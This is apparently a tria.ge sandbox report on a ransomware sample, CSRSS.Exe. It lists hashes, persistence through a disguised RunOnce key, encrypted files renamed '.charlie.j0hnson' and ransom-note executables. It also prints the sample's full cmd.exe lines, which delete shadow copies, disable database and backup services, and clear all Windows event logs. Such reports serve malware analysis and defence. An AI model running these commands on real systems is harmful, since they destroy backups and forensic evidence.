Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
10/04/2021, 11:24
Static task
static1
Behavioral task
behavioral1
Sample
CSRSS.Exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
CSRSS.Exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
CSRSS.Exe
-
Size
210KB
-
MD5
67438e8ddb537ef31fd86c5b046e986b
-
SHA1
0722038e02681bb4f1312b92bd62cd070476f3d6
-
SHA256
d7f19de8eb2461c635c0170448a58a1ec6e6de014b4410883f87d0b5d7868e65
-
SHA512
31ba7615a173c84cd59152ed44d707ef81f37bba9d91bc9afb86d89cb6c99f4346cfdce272224f7c3e00f0b23ff930df7cc4285d63fc2185e50669ad8c5c7c39
Score
10/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1408 HOW TO RETURN YOU FILES.exe -
Deletes itself 1 IoCs
pid Process 1484 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdateCheck = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CSRSS.Exe" CSRSS.Exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce CSRSS.Exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: CSRSS.Exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jre7\lib\ext\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\IEContentService.exe.charlie.j0hnson CSRSS.Exe File created C:\Program Files\Java\jre7\lib\cmm\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Metro.thmx.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Google\Update\Install\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files\Java\jre7\bin\jsound.dll.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Microsoft Office\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TextConv\en-US\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\COUPON.POC.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR43B.GIF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Windows Media Player\wmplayer.exe.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Discussion.css.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089945.WMF.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_livehttp_plugin.dll.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SLINTL.DLL.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199727.WMF.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\HOW TO RETURN YOU FILES.exe CSRSS.Exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_bg.dll.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\AMERITECH.NET.XML.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\DEEPBLUE\THMBNAIL.PNG.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsImageTemplate.html.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.charlie.j0hnson CSRSS.Exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\HOW TO RETURN YOU FILES.exe CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\LightSpirit.css.charlie.j0hnson CSRSS.Exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\HOW TO RETURN YOU FILES.exe CSRSS.Exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeBackupPrivilege 1336 CSRSS.Exe Token: SeRestorePrivilege 1336 CSRSS.Exe Token: SeManageVolumePrivilege 1336 CSRSS.Exe Token: SeTakeOwnershipPrivilege 1336 CSRSS.Exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1408 HOW TO RETURN YOU FILES.exe 1408 HOW TO RETURN YOU FILES.exe 1408 HOW TO RETURN YOU FILES.exe 1408 HOW TO RETURN YOU FILES.exe 1408 HOW TO RETURN YOU FILES.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1336 wrote to memory of 1356 1336 CSRSS.Exe 26 PID 1336 wrote to memory of 1356 1336 CSRSS.Exe 26 PID 1336 wrote to memory of 1356 1336 CSRSS.Exe 26 PID 1336 wrote to memory of 1356 1336 CSRSS.Exe 26 PID 1336 wrote to memory of 772 1336 CSRSS.Exe 38 PID 1336 wrote to memory of 772 1336 CSRSS.Exe 38 PID 1336 wrote to memory of 772 1336 CSRSS.Exe 38 PID 1336 wrote to memory of 772 1336 CSRSS.Exe 38 PID 1336 wrote to memory of 1484 1336 CSRSS.Exe 40 PID 1336 wrote to memory of 1484 1336 CSRSS.Exe 40 PID 1336 wrote to memory of 1484 1336 CSRSS.Exe 40 PID 1336 wrote to memory of 1484 1336 CSRSS.Exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe"C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe"1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled2⤵PID:1356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off vssadmin Delete Shadows /all /quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil cl "%1"2⤵PID:772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe > nul2⤵
- Deletes itself
PID:1484
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:464
-
C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe"C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1408